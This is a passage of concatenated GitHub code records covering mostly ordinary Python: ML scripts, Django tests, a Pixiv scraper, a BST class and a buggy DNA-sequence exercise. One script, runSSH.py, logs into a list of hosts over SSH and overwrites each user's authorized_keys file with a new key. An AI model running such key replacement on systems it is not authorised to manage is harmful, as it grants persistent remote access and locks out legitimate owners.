ll)\n tmp2 = self.parent.mm.getMask(tmp)\n if not tmp2:\n continue\n else:\n un = tmp2[0]\n try:\n chebiMasks = self.chebip.getChebiMasks(un, self.parent.mm)\n except:\n pdb.set_trace()\n if self.parent.mm.debug:\n print(\"#COMMENT mask \" + str(ll) + \" chebi \" + str(list(chebiMasks.keys())))\n chMask = mask({})\n for ch in list(chebiMasks.keys()):\n chebiMasks[ch].setAllAssoc(self.parent.mm.addAss())\n chMask.merge(chebiMasks[ch])\n self.parent.setMask(chMask, setass=False)\n","repo_name":"hredestig/metmask","sub_path":"metmask/parse/_chebi.py","file_name":"_chebi.py","file_ext":"py","file_size_in_byte":9487,"program_lang":"python","lang":"en","doc_type":"code","stars":2,"dataset":"github-code","pt":"35"} +{"seq_id":"41583962859","text":"import csv\nimport paramiko\n#key_fname should be your ssh private key\nkey_fname='assignmentKeyPair.pem'\n#hostnames.txt is the file that contains hostnames and the ip addresses of the machine in the format hostnameip\nwith open(\"hostnames.txt\") as f:\n for line in f:\n arr=line.split()\n uname=arr[0]\n ip=arr[1]\n ssh = paramiko.SSHClient()\n ssh.set_missing_host_key_policy(paramiko.AutoAddPolicy())\n ssh.connect(ip, username=uname, key_filename=key_fname)\n stdin, stdout, stderr = ssh.exec_command('hostname')\n hostname=stdout.readlines()[0].rstrip()\n print (hostname)\n stdin, stdout, stderr = ssh.exec_command('stat --format=mtime=%y\\|ctime=%z\\|atime=%x ~/.ssh/authorized_keys')\n stats = stdout.readlines()[0].rstrip()\n print(stats)\n sftp = ssh.open_sftp()\n path='/home/'+uname+'/.ssh/authorized_keys'\n\t\t#newkey.pub is the replacement SSH Authorized Key File\n sftp.put('newkey.pub',path)\n stdin, stdout, stderr = ssh.exec_command('cat '+path)\n content = stdout.readlines()[0].rstrip()\n\t\t#Output is generated in output.csv file\n with open('output.csv','a') as f1:\n writer=csv.writer(f1)\n writer.writerow([hostname,ip,stats,content])","repo_name":"ashishmalpani706/sysops","sub_path":"runSSH.py","file_name":"runSSH.py","file_ext":"py","file_size_in_byte":1285,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"35"} +{"seq_id":"13670179991","text":"# from program.matematyka import dodaj, odejmij, pomnoz\nfrom program import *\nfrom program.klasa1 import Human\n\n# print(\"Witaj w moim programie!\")\n#\n# print(matematyka.dodaj(5, 5))\n# print(matematyka.odejmij(10, 5))\n# print(matematyka.pomnoz(4, 2))\n# print(podziel(4, 2))\n\nczlowiek1 = Human(\"Adam\", 25, \"m\")\n# czlowiek1.imie = \"Adam\"\n# czlowiek1.wiek = 25\n# czlowiek1.plec = 'm'\n\nczlowiek1.witaj()\nczlowiek1.spacer()\nczlowiek1.policz(5, 5)\n\nczlowiek2 = Human(\"Ewa\", 22, 'k')\n# czlowiek2.imie = \"Ewa\"\n# czlowiek2.wiek = 22\n# czlowiek2.plec = 'k'\n\nczlowiek2.witaj()\nczlowiek2.spacer()\nczlowiek2.policz(15, 65)\n\nczlowiek3 = Human(\"Ala\", 5, \"k\")\n# czlowiek3.imie = \"Ala\"\n# czlowiek3.wiek = 5\n# czlowiek3.plec = 'k'\n\nczlowiek3.witaj()\nczlowiek3.spacer()\nczlowiek3.policz(15, 65)\n\nczlowiek4 = Human(wiek=14, imie=\"Magda\")\n\nczlowiek4.witaj()\nczlowiek4.spacer()\nczlowiek4.policz(15, 65)\n","repo_name":"dev-com2020/19_21_szkolenie","sub_path":"start.py","file_name":"start.py","file_ext":"py","file_size_in_byte":879,"program_lang":"python","lang":"pl","doc_type":"code","stars":0,"dataset":"github-code","pt":"35"} +{"seq_id":"23972003019","text":"import sys\nimport yaml\nfrom pathlib import Path\n\nfrom numpy import in1d, where\nfrom sklearn.model_selection import train_test_split\nfrom sklearn.datasets import load_svmlight_file, dump_svmlight_file\n\n\ndef execute(X, y, qid, test_size):\n unique_qids = list(set(qid))\n train_qids, test_qids = train_test_split(unique_qids, test_size=test_size)\n\n mask = in1d(qid, train_qids)\n train_indexes = where(mask)[0]\n test_indexes = where(~mask)[0]\n\n X_train = X[train_indexes]\n y_train = y[train_indexes]\n qid_train = qid[train_indexes]\n\n X_test = X[test_indexes]\n y_test = y[test_indexes]\n qid_test = qid[test_indexes]\n\n dataset_path = f\"database/dataset\"\n\n Path(dataset_path).mkdir(parents=True, exist_ok=True)\n\n dump_svmlight_file(X=X_train, y=y_train, query_id=qid_train, f=f'{dataset_path}/train.txt')\n dump_svmlight_file(X=X_test, y=y_test, query_id=qid_test, f=f'{dataset_path}/test.txt')\n\n\nif __name__ == '__main__':\n dataset_path = sys.argv[1]\n test_size = yaml.safe_load(open('params.yaml'))['data_splitting']['test_size']\n X, y, qid = load_svmlight_file(dataset_path, query_id=True)\n execute(X=X, y=y, qid=qid, test_size=test_size)","repo_name":"arthurbv2/cin_data_science_ml_eng_class","sub_path":"dvc_demo/nodes/train_test_split_node.py","file_name":"train_test_split_node.py","file_ext":"py","file_size_in_byte":1189,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"35"} +{"seq_id":"73069755941","text":"from rest_framework.test import APITestCase, APIRequestFactory, force_authenticate\nfrom users.models import User\nfrom django.urls import reverse\nfrom rest_framework import status\n\nfrom .models import User\nfrom .views import UserListView, UserDetailsView\n\n\nclass UserTests(APITestCase):\n\n @classmethod\n def setUp(cls):\n cls.testuser = User.objects.create_user(\n username='testuser',\n password='testpassword')\n\n cls.testadmin = User.objects.create_superuser(\n username='admin',\n email='admin@admin.com',\n password='testadminpassword')\n\n cls.testuser.save()\n cls.testadmin.save()\n cls.factory = APIRequestFactory()\n\n def test_user_details(self):\n \"\"\"\n Test user details view.\n Existing user credentials are used to authenticate the request.\n \"\"\"\n url = reverse(\"users:user-details\", args=[self.testuser.pk])\n request = self.factory.get(url)\n force_authenticate(request, user=self.testuser)\n response = UserDetailsView.as_view()(request, pk=self.testuser.pk)\n\n self.assertEqual(response.status_code, status.HTTP_200_OK)\n\n def test_user_details_unauthenticated(self):\n \"\"\"\n Test user details view.\n No authentication is performed.\n \"\"\"\n url = reverse(\"users:user-details\", args=[self.testuser.pk])\n request = self.factory.get(url)\n response = UserDetailsView.as_view()(request, pk=self.testuser.pk)\n\n self.assertEqual(response.status_code, status.HTTP_401_UNAUTHORIZED)\n\n def test_user_list_as_superuser(self):\n \"\"\"\n Test users list view.\n Existing superuser credentials are used to authenticate the request.\n \"\"\"\n request = self.factory.get('/api/users/')\n force_authenticate(request, user=self.testadmin)\n response = UserListView.as_view()(request)\n\n self.assertEqual(response.status_code, status.HTTP_200_OK)\n\n def test_user_list_as_user(self):\n \"\"\"\n Test user list view.\n Existing user credentials are used, but they should be insufficient.\n \"\"\"\n request = self.factory.get('/api/users/')\n force_authenticate(request, user=self.testuser)\n response = UserListView.as_view()(request)\n\n self.assertEqual(response.status_code, status.HTTP_403_FORBIDDEN)\n\n def test_user_list_unauthenticated(self):\n \"\"\"\n Test user list view.\n No authentication is performed.\n \"\"\"\n request = self.factory.get('/api/users/')\n response = UserListView.as_view()(request)\n\n self.assertEqual(response.status_code, status.HTTP_401_UNAUTHORIZED)\n\n def test_get_current_user_authenticated(self):\n \"\"\"\n Test getting current user data.\n Authentication is provided\n \"\"\"\n request = self.factory.get('/api/users/whoami')\n force_authenticate(request, user=self.testuser)\n response = UserDetailsView.as_view()(request, pk=self.testuser.pk)\n\n # compare if response matches with user data\n for key, value in response.data.items():\n self.assertEqual(value, vars(request.user)[key])\n\n self.assertEqual(response.status_code, status.HTTP_200_OK)\n\n def test_get_current_user_unauthenticated(self):\n \"\"\"\n Test getting current user data.\n Authentication is not provided\n \"\"\"\n request = self.factory.get('/api/users/current')\n response = UserDetailsView.as_view()(request, pk=None)\n\n self.assertEqual(response.status_code, status.HTTP_401_UNAUTHORIZED)\n","repo_name":"nokia-wroclaw/innovativeproject-inventory-of-supplies","sub_path":"backend/users/tests.py","file_name":"tests.py","file_ext":"py","file_size_in_byte":3632,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"35"} +{"seq_id":"11958129458","text":"import h2o\r\nimport numpy as np\r\nh2o.init()\r\n\r\ndf = h2o.import_file(\"F:/Kaggle/Santander Customer/train.csv\")\r\ndf.col_names\r\n\r\ndf_test = h2o.import_file(\"F:/Kaggle/Santander Customer/test.csv\")\r\ndf_test.col_names\r\n\r\ny_col = 'TARGET'\r\nx_cols = df.col_names\r\nx_cols.remove(y_col)\r\nx_cols.remove('ID')\r\nprint(\"Response = \" + y_col)\r\nprint(\"Pridictors = \" + str(x_cols))\r\n\r\ndf['TARGET'] = df['TARGET'].asfactor()\r\ndf['TARGET'].levels()\r\n\r\ntrain, test = df.split_frame(ratios=[.8],seed=2021)\r\n\r\n######################## Grid Search ############################################\r\n\r\nfrom h2o.grid.grid_search import H2OGridSearch\r\nhyper_parameters = {'mtries': list(np.arange(10,60,10))}\r\nmodel_rf = H2ORandomForestEstimator(seed=2021)\r\ngs = H2OGridSearch(model=model_rf,hyper_params=hyper_parameters)\r\ngs.train(x=x_cols, y=y_col, training_frame=train, \r\n validation_frame=test, \r\n model_id=\"model_rf_tune\")\r\nmodels = gs.get_grid(sort_by='auc', decreasing=True)\r\nbest_model = models.models[0]\r\nbest_params = best_model.actual_params\r\nbest_params\r\nbest_model_perf1 = best_model.model_performance(test)\r\nbest_model_perf1.auc()\r\n\r\n######################################################################################\r\n\r\ny_pred = best_model.predict(test_data=df_test)\r\npreds = y_pred.as_data_frame()\r\nTestID = df_test[\"ID\"]\r\nID = TestID.as_data_frame()\r\nID = ID['ID']\r\nTARGET = preds['p1']\r\nimport pandas as pd\r\nsubmit = pd.DataFrame({'ID':ID, 'TARGET':TARGET})\r\n\r\nsubmit.to_csv(\"F:/Kaggle/Santander Customer/submit_h2o_rf.csv\",\r\n index=False)\r\n\r\n\r\n","repo_name":"oliabhi/Machine-Learning","sub_path":"Codes/santan_h2o_rf_grid.py","file_name":"santan_h2o_rf_grid.py","file_ext":"py","file_size_in_byte":1586,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"35"} +{"seq_id":"42572691278","text":"\n\n# sci-kit learn libraries\nimport sklearn\nfrom sklearn.svm import LinearSVC\nfrom sklearn.svm import SVC\nfrom sklearn.datasets import make_classification\nfrom sklearn.metrics import hinge_loss\n\n# dataset and ml libraries\nfrom keras.datasets import cifar10\nimport torch\nimport tensorflow\nimport onnx\n\nimport numpy as np\n\n# plotting libraries\nimport matplotlib.pyplot as plt\nimport seaborn as sns\n\n# miscellaneous\nimport time\nimport random\nimport sys\nfrom pdb import set_trace\n\n# Set seeds for poison / camou / target selection here:\nrandom.seed(222222)\n\n# Class Dictionary for CIFAR10\nclassDict = {'plane': 0, 'car': 1, 'bird': 2, 'cat': 3, 'deer': 4,\n 'dog': 5, 'frog': 6, 'horse': 7, 'ship': 8, 'truck': 9}\n\nbinaryClasses = {0:'Machine', 1:'Animal'} # Machine , Animal\n\n# Method to obtain camouflages: use \"BREW\" for Gradient matching or \"FLIP\" by label flipping\nCAMO = 'BREW'\n\n(x_train, y_train_label), (x_test, y_test_label) = cifar10.load_data()\n\ndef rgb_to_gray(images):\n return np.dot(images[...,:3], [0.2989, 0.5870, 0.1140])\n\n# Convert RGB to grayscale\nx_train = rgb_to_gray(x_train)\nx_test = rgb_to_gray(x_test)\n\n# Expand dimensions for grayscale channel (making it 32x32x1)\nx_train = np.expand_dims(x_train, axis=-1)\nx_test = np.expand_dims(x_test, axis=-1)\n\n# Normalize pixel values and dividing each image by its Frobenius norm\nx_train = x_train / 255.0\nx_test = x_test / 255.0\nm_train, m_test = x_train.shape[0], x_test.shape[0]\n\nx_train_flat = x_train.reshape(m_train, -1)\nx_test_flat = x_test.reshape(m_test, -1)\nx_train_norm = np.linalg.norm(x_train_flat, ord=2, axis=1, keepdims=True)\nx_test_norm = np.linalg.norm(x_test_flat, ord=2, axis=1, keepdims=True)\n\nx_train_flat = x_train_flat / x_train_norm\nx_test_flat = x_test_flat / x_test_norm\n\n# Flatten labels\ny_train_label = y_train_label.ravel()\ny_test_label = y_test_label.ravel()\nanimal_indices = []\nmachine_indices = []\n\ny_train = np.array([False] * m_train)\ny_test = np.array([False] * m_test)\n\n# Convert to Binary dataset\nfor i in range(m_test):\n if y_test_label[i] in [2,3,4,5,6,7]:\n y_test[i] = True\n else:\n y_test[i] = False\n\nfor i in range(m_train):\n if y_train_label[i] in [2,3,4,5,6,7]:\n y_train[i] = True\n animal_indices.append(i)\n else:\n y_train[i] = False\n machine_indices.append(i)\n\nstart_time = time.time()\n\n#model_SVC = SVC(kernel = 'linear', max_iter=100, probability=True)\nclean_model = LinearSVC(loss='hinge', max_iter=3000)\n#fit\nclean_model.fit(x_train_flat, y_train)\n\nprint(\"Elapsed[s] : \", time.time() - start_time)\n\ndef show_image(img, norm = None):\n if norm:\n #To show Image:\n target = img * norm\n plt.imshow(target.reshape(32, 32, 1))\n plt.show()\n else:\n plt.imshow(img.reshape(32, 32, 1))\n plt.show()\n\nclose_pos = []\n\n# Run model on Test set\n\ndecision_function_test = clean_model.decision_function(x_test_flat)\n\n# Find all support vectors of the model\nclose_positives = np.where((decision_function_test <= 0.1) & (decision_function_test > 0))[0]\nprint(close_positives)\n\n# Making sure the target is chosen from animals but prediction is machine\n# score > 0: Machine as Class 0\n# score < 0: Animal as Class 1\nfor ind in close_positives:\n if y_test[ind] == 1:\n close_pos.append(ind)\n\ntarget_indice = random.choices(close_pos)\n\nprint('target_indice:', target_indice)\ntarget_label = 0\ntarget = x_test_flat[target_indice[0]].reshape(1, -1)\ntarget_original_label = y_test[target_indice[0]]\n\n#To show Target Image:\nplt.imshow(target.reshape(32, 32, 1) * x_test_norm[target_indice[0]])\nprint(\"Target chosen from class:\", binaryClasses[target_original_label])\nprint(\"Target assigned to class:\", binaryClasses[target_label])\n\n# Deleting Target from orignal test set.\nx_test = np.delete(x_test_flat, target_indice[0], 0)\ntarget_original_label = y_test[target_indice[0]]\ny_test = np.delete(y_test, target_indice[0], 0)\n\n# check if notebook is in colab\ntry:\n # install ezkl\n import google.colab\n import subprocess\n #import sys\n subprocess.check_call([sys.executable, \"-m\", \"pip\", \"install\", \"ezkl\"])\n subprocess.check_call([sys.executable, \"-m\", \"pip\", \"install\", \"onnx\"])\n subprocess.check_call([sys.executable, \"-m\", \"pip\", \"install\", \"sk2torch\"])\n\n# rely on local installation of ezkl if the notebook is not in colab\nexcept:\n pass\n\n\n# here we create and (potentially train a model)\n\n# make sure you have the dependencies required here already installed\nimport json\n#import numpy as np\nfrom sklearn.svm import SVC\nimport sk2torch\n#import torch\nimport ezkl\nimport os\n\nimport warnings\nwarnings.filterwarnings('ignore')\n\n# check if notebook is in colab\ntry:\n import sys\n\n subprocess.check_call([sys.executable, \"-m\", \"pip\", \"install\", \"solc-select\"])\n # 执行其他 shell 命令\n subprocess.run([\"solc-select\", \"install\", \"0.8.20\"], check=True)\n subprocess.run([\"solc-select\", \"use\", \"0.8.20\"], check=True)\n subprocess.run([\"solc\", \"--version\"], check=True)\n\n# rely on local installation if the notebook is not in colab\nexcept:\n pass\n\nmodel_path = os.path.join('network.onnx')\ncompiled_model_path = os.path.join('network.compiled')\npk_path = os.path.join('test.pk')\nvk_path = os.path.join('test.vk')\nsettings_path = os.path.join('settings.json')\nsrs_path = os.path.join('kzg.srs')\nwitness_path = os.path.join('witness.json')\ndata_path = os.path.join('input.json')\nproof_path = os.path.join('proof.json')\n\naggregate_proof_path = os.path.join('aggr.pf')\naggregate_vk_path = os.path.join('aggr.vk')\naggregate_pk_path = os.path.join('aggr.pk')\n\nasync def async_function(data_path, model_path, settings_path, resource_string):\n res = await ezkl.calibrate_settings(data_path, model_path, settings_path, resource_string)\n assert res == True\n\ndef gen_verifier(wrap_model, input_image, expected_output):\n print ('Challenge Image:')\n show_image(input_image, x_test_norm[target_indice[0]])\n\n model = sk2torch.wrap(wrap_model)\n x = torch.from_numpy(input_image)\n torch_out = model.predict(x)\n\n val = torch_out.item()\n\n if val != expected_output:\n #print (torch_out)\n print ('Error! Model trained by dataset predicting this image as animal is', val)\n return\n\n print ('Basic check passes, generate ZKML verifier')\n torch.onnx.export(model, # model being run\n # model input (or a tuple for multiple inputs)\n x,\n # where to save the model (can be a file or file-like object)\n \"network.onnx\",\n export_params=True, # store the trained parameter weights inside the model file\n opset_version=10, # the ONNX version to export the model to\n do_constant_folding=True, # whether to execute constant folding for optimization\n input_names=['input'], # the model's input names\n output_names=['output'], # the model's output names\n dynamic_axes={'input': {0: 'batch_size'}, # variable length axes\n 'output': {0: 'batch_size'}})\n\n d = ((x).detach().numpy()).reshape([-1]).tolist()\n\n data = dict(input_shapes=[target.shape[1:]],\n input_data=[d],\n output_data=[o.reshape([-1]).tolist() for o in torch_out])\n\n # Serialize data into file:\n json.dump(data, open(\"input.json\", 'w'))\n\n\n # TODO: Dictionary outputs\n res = ezkl.gen_settings(model_path, settings_path)\n assert res == True\n\n res = async_function(data_path, model_path, settings_path, \"resource\")\n #res = await ezkl.calibrate_settings(data_path, model_path, settings_path, resource_string)\n #assert res == True\n\n res = ezkl.compile_model(model_path, compiled_model_path, settings_path)\n assert res == True\n\n # srs path\n res = ezkl.get_srs(srs_path, settings_path)\n\n # now generate the witness file\n res = ezkl.gen_witness(data_path, compiled_model_path, witness_path, settings_path = settings_path)\n assert os.path.isfile(witness_path)\n\n res = ezkl.setup(\n compiled_model_path,\n vk_path,\n pk_path,\n srs_path,\n settings_path,\n )\n\n assert res == True\n assert os.path.isfile(vk_path)\n assert os.path.isfile(pk_path)\n assert os.path.isfile(settings_path)\n\n # GENERATE A PROOF\n\n\n res = ezkl.prove(\n witness_path,\n compiled_model_path,\n pk_path,\n proof_path,\n srs_path,\n \"poseidon\", # for aggregated EVM proof only ELSE 'evm'\n \"single\",\n settings_path,\n )\n print ('Successfully generate ZK Proof!')\n print(res)\n assert os.path.isfile(proof_path)\n\n# gen_verifier(clean_model, target, True)\n#\n# sol_code_path = os.path.join('Verifier.sol')\n# abi_path = os.path.join('Verifier.abi')\n# res = ezkl.create_evm_verifier(\n# vk_path,\n# srs_path,\n# settings_path,\n# sol_code_path,\n# abi_path\n# )\n#\n# assert res == True\n# assert os.path.isfile(sol_code_path)\n\n","repo_name":"xzd1621/zkmlProver","sub_path":"BackEnd/Agg_Testing.py","file_name":"Agg_Testing.py","file_ext":"py","file_size_in_byte":9169,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"35"} +{"seq_id":"32750331163","text":"\"\"\"\nSupervised learning classification\n\"\"\"\nimport pandas as pd\nfrom timeit import default_timer as timer\nfrom sklearn import preprocessing\nfrom sklearn.model_selection import train_test_split\nfrom sklearn.metrics import accuracy_score\n\n\nclass MultiClassifier:\n \"\"\"\n Uses multiple statistical classification models to classify data\n\n :param data: Pandas DataFrame dataset\n :param models: Dictionary of classificiation models\n \"\"\"\n def __init__(self, data, models):\n self.data = data\n self.models = models\n self.names = list(models.keys()) \n\n def preprocess(self, size=0.25):\n \"\"\"\n Preprocesses the dataset for training\n \"\"\"\n self.encoders = {}\n self.processed = {}\n\n for column in self.data.columns:\n # Encode all labels to value between 0..n-1\n self.encoders[column] = preprocessing.LabelEncoder()\n self.data[column] = self.encoders[column].fit_transform(self.data[column])\n \n # Split data into train and test\n data_X, data_y = self.data.iloc[:, 1:], self.data.iloc[:, 0]\n split_data = train_test_split(data_X, data_y, test_size=size)\n\n # Save y column name\n self.y_column = data_y.name\n \n self.processed['train_X'] = split_data[0]\n self.processed['test_X'] = split_data[1]\n self.processed['train_y'] = split_data[2]\n self.processed['test_y'] = split_data[3]\n\n def train_all(self):\n \"\"\"\n Train the dataset on each statistical model\n \"\"\"\n self.performances = []\n\n for key, model in self.models.items():\n start = timer()\n model.fit(self.processed['train_X'], self.processed['train_y'])\n end = timer()\n self.performances.append(end - start)\n\n def test_all(self):\n \"\"\"\n Test the statistical models on the test data and output its accuracy\n \n :returns: Accuracy score for each model (0.0-1.0)\n \"\"\"\n self.predictions = []\n self.accuracies = []\n\n for key, model in self.models.items():\n predict_y = model.predict(self.processed['test_X'])\n self.predictions.append(predict_y)\n accuracy = accuracy_score(self.processed['test_y'], predict_y)\n self.accuracies.append(accuracy)\n\n def predict_new(self, item):\n \"\"\"\n Classify new item based on trained data\n\n :param item: Pandas DataFrame for prediction\n :returns: Dictionary of predictions from each model\n \"\"\"\n for column in item.columns:\n item[column] = self.encoders[column].transform(item[column])\n \n # Predict using each model\n predictions = []\n for key, model in self.models.items():\n prediction = model.predict(item)\n # Decode back to actual label\n predictions.append(self.encoders[self.y_column].inverse_transform(prediction))\n\n return predictions","repo_name":"seanhelm/toadstool","sub_path":"toadstool/learn/learn.py","file_name":"learn.py","file_ext":"py","file_size_in_byte":2994,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"35"} +{"seq_id":"33849096515","text":"'''\nCreated on 2015. 12. 2.\n\n@author: User\n'''\ndef hamming(seq1,seq2):\n \n count = 0\n assert len(seq1)== len(seq2), 'strings should have equal length'\n for x in range(len(seq1)):\n if seq1[x] != seq2[x]:\n count += 1\n return count\n\ndef complement(seq):\n\n x = seq[::-1]\n count = ''\n for y in x:\n if y == 'T':\n count += 'A'\n elif y == 'C':\n count += 'G'\n elif y == 'A':\n count += 'T' \n elif y == 'G':\n count += 'C' \n return count\n\ndef normalform(seq):\n list1 = []\n vari = complement(seq)\n list1.append(seq)\n list1.append(vari)\n list.sort()\n return list1[0]\ndef occurrences(seq):\n list =[]\n dict = {}\n count = 0\n for x in seq:\n list.append(normalform(x))\n for seq in list:\n dict[seq] = list.append(seq)\n return\n\ndef errors(seq):\n seq = list(seq)\n correct = []\n incorrect = []\n group = set()\n list = set()\n list1 = []\n \n a = len(seq)\n seq1 = seq\n \n for x in range(len(seq)):\n if seq[x] != complement(seq[x]):\n seq1.append(object)\n \nif __name__ == '__main__':\n import doctest\n doctest.testmod()\n \n","repo_name":"isk02206/python","sub_path":"informatics/previous informatics/Informatics-2/series 8/error.py","file_name":"error.py","file_ext":"py","file_size_in_byte":1226,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"35"} +{"seq_id":"13337997150","text":"from pprint import pformat\nimport sys\nfrom typing import List\nimport requests\nimport re\nimport os\nimport datetime\nimport json\n\nheaders = {\n \"user-agent\": \"Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/86.0.4240.111 Safari/537.36\",\n \"referer\": \"https://www.pixiv.net/ranking.php?mode=daily&content=illust\",\n}\n\nPixivPath = \"./pixiv/\"\nrepeat = 1\nrepeat_user_name = 1\n\n\ndef getSinglePic(url, picPath):\n global repeat\n global repeat_user_name\n proxies = get_proxy()\n response = requests.get(url, headers=headers, proxies=proxies)\n if (\n re.search('\"xRestrict\":(.+?),\"sl\"', response.text).group()\n != '\"xRestrict\":0,\"sl\"'\n ):\n return False\n # 提取图片名称\n name = re.search('\"illustTitle\":\"(.+?)\"', response.text)\n name = name.group(1)\n illust_id = re.search('\"illustId\":\"(.+?)\"', response.text)\n illust_id = illust_id.group(1)\n user_name = re.search('\"userName\":\"(.+?)\"', response.text)\n user_name = user_name.group(1)\n if re.search('[\\\\\\ \\/ \\* \\? \" \\: \\< \\> \\|]', name) != None:\n name = re.sub('[\\\\\\ \\/ \\* \\? \" \\: \\< \\> \\|]', str(repeat), name)\n repeat += 1\n if re.search('[\\\\\\ \\/ \\* \\? \" \\: \\< \\> \\|]', user_name) != None:\n user_name = re.sub(\n '[\\\\\\ \\/ \\* \\? \" \\: \\< \\> \\|]', str(repeat_user_name), user_name\n )\n repeat_user_name += 1\n # 提取图片原图地址\n picture = re.search('\"original\":\"(.+?)\"},\"tags\"', response.text)\n if picture == None:\n return False\n pic = requests.get(picture.group(1), headers=headers, proxies=proxies)\n print(picture.group(1))\n f = open(\n picPath + \"%s-by-%s.%s\" % (illust_id, user_name, picture.group(1)[-3:]), \"wb\"\n )\n f.write(pic.content)\n f.close()\n return True\n\n\ndef generateJson(picPath: str):\n # generate one picPath json file\n # generate_one_json(picPath)\n # generate other json file\n path = PixivPath\n dirs_all = os.listdir(path)\n for dir in dirs_all:\n pd = path + dir\n if os.path.isdir(pd):\n # json_file = get_file_list(pd+\"/\", ['.json'])\n generate_one_json(pd + \"/\")\n\n # generate url.json file with other json file url\n pixivPath = path\n pixivJsonPath = path + \"url.json\"\n path = [\n os.path.join(dp, f)\n for dp, dn, fs in os.walk(pixivPath)\n for f in fs\n if os.path.splitext(f)[1] in [\".json\"]\n ]\n path = [i for i in path if i.find(pixivJsonPath) == -1]\n pixiv_json = {\"pixiv\": path}\n jj = json.dumps(pixiv_json)\n f = open(pixivJsonPath, \"wb\")\n f.write(jj.encode())\n f.close()\n\n\n# generate one picPath json file\n\n\ndef generate_one_json(picPath):\n file_path = get_file_list(picPath, [\".jpg\", \".png\"])\n struct = rename_with_short_name(file_path)\n # check struct length\n if len(struct) == 0:\n return\n pixiv_json = {\"pixiv_pic\": struct}\n pixiv_json_path = picPath + \"pixiv_pic.json\"\n pixiv_json_file = open(pixiv_json_path, \"wb\")\n pixiv_json_file.write(json.dumps(pixiv_json).encode())\n pixiv_json_file.close()\n\n\ndef rename_with_short_name(files: List[str]):\n # a struct has name ,path and index\n struct = []\n for i in range(len(files)):\n file = files[i]\n file_name = os.path.basename(file)\n # check file name has \"-by-\"\n if file_name.find(\"-by-\") == -1:\n continue\n # 获取文件后缀\n file_ext = os.path.splitext(file_name)[1]\n id = file_name.split(\"_\")[0]\n user_name = file_name.split(\"-by-\")[1].split(\".\")[0]\n new_name = id + file_ext\n # renme and check file is exists\n if os.path.exists(os.path.dirname(file) + \"/\" + new_name):\n print(\"file exists\")\n new_name = id + \"-\" + str(i) + file_ext\n os.rename(file, os.path.dirname(file) + \"/\" + new_name)\n else:\n os.rename(file, os.path.dirname(file) + \"/\" + new_name)\n struct.append(\n {\n \"name\": id,\n # \"path\": files[i],\n \"index\": i,\n \"user\": user_name,\n \"ext\": file_ext,\n }\n )\n return struct\n\n\ndef get_file_list(path: str, file_ext: List[str]) -> List[str]:\n file_list: List[str] = [\n os.path.join(dp, f)\n for dp, dn, fs in os.walk(path)\n for f in fs\n if os.path.splitext(f)[1] in file_ext\n ]\n return file_list\n\n\ndef get_proxy():\n proxies = {\"http\": \"http://127.0.0.1:10900\", \"https\": \"http://127.0.0.1:10900\"}\n # proxies = None\n return proxies\n\n\ndef getAllPicUrl():\n count = 1\n dataTime = datetime.datetime.now().strftime(\"%Y-%m-%d-%H-%M-%S\")\n proxies = get_proxy()\n picPath = PixivPath + dataTime + \"/\"\n for n in range(1, 2):\n url = (\n \"https://www.pixiv.net/ranking.php?mode=daily&content=illust&p=%d&format=json\"\n % n\n )\n response = requests.get(url, headers=headers, proxies=proxies)\n illust_id = re.findall('\"illust_id\":(\\d+?),', response.text)\n if not os.path.exists(picPath):\n os.makedirs(picPath)\n picUrl = [\"https://www.pixiv.net/artworks/\" + i for i in illust_id]\n for url in picUrl:\n print(\"Downloading the picture %d \" % count, end=\" \")\n print(\"OK\" if getSinglePic(url, picPath) else \"FAILED\", end=\"\\n\")\n count += 1\n # os.system(\"ls -al\")\n generateJson(picPath)\n return None\n\n\ndef renameAndGenerateJson():\n # generate other json file\n path = PixivPath\n dirs_all = os.listdir(path)\n for dir in dirs_all:\n pd = path + dir\n if os.path.isdir(pd):\n # json_file = get_file_list(pd+\"/\", ['.json'])\n generate_one_json(pd + \"/\")\n\n\ngetAllPicUrl()\n# renameAndGenerateJson()\n","repo_name":"SABERBOY/PixivGenerator","sub_path":"pa.py","file_name":"pa.py","file_ext":"py","file_size_in_byte":5822,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"35"} +{"seq_id":"8894945794","text":"__author__ = 'robbie'\n\nclass Queue:\n def __init__(self):\n self.items = []\n\n def isEmpty(self):\n return self.items == []\n\n def enqueue(self, item):\n self.items.insert(0, item)\n\n def dequeue(self):\n return self.items.pop()\n\n def size(self):\n return len(self.items)\n\n\nclass BSTNode:\n def __init__(self, e = None):\n self.element = e\n self.left = None\n self.right = None\n\n def __repr__(self):\n return str(self.element)\n\n def search(self,e):\n current = self\n found = False\n while not found and current:\n if current.element < e:\n current = current.right\n elif current.element > e:\n current = current.left\n else:\n found = True\n if found:\n return current\n else:\n return None\n\n def rinsert(self,e):\n if e.element > self.element:\n if self.right is None:\n self.right = e\n else:\n self.right.rinsert(e)\n if e.element < self.element:\n if self.left is None:\n self.left = e\n else:\n self.left.rinsert(e)\n\n def rsearch(self, e):\n #is equal\n if self.element == e.element:\n return True\n #is lower\n if e.element < self.element:\n if self.left is not None:\n return self.left.rsearch(e)\n else:\n return False\n #is higher\n if e.element > self.element:\n if self.right is not None:\n return self.right.rsearch(e)\n else:\n return False\n\n def rmax(self):\n if self.right is None:\n return self.element\n return self.right.rmax()\nclass BST:\n def __init__(self):\n self.root = None\n\n def search(self, e):\n if self.root and e:\n return self.root.search(e)\n else:\n return None\n\n def insert(self, e):\n if self.root is None and e:\n self.root = e\n else:\n self.root.rinsert(e)\n\n def search(self, e):\n if self.root and e:\n return self.root.rsearch(e)\n\n def max(self):\n return self.root.rmax()\n\n def showLevelOrder(self):\n q = Queue()\n level = 1\n if self.root is not None:\n q.enqueue(self.root)\n\n while q.isEmpty() is False:\n row = []\n while q.isEmpty() is False:\n row.append(q.dequeue())\n for elem in row:\n if elem.left is not None:\n q.enqueue(elem.left)\n if elem.right is not None:\n q.enqueue(elem.right)\n print('level' + str(level))\n print(row)\n level += 1\n\nbst = 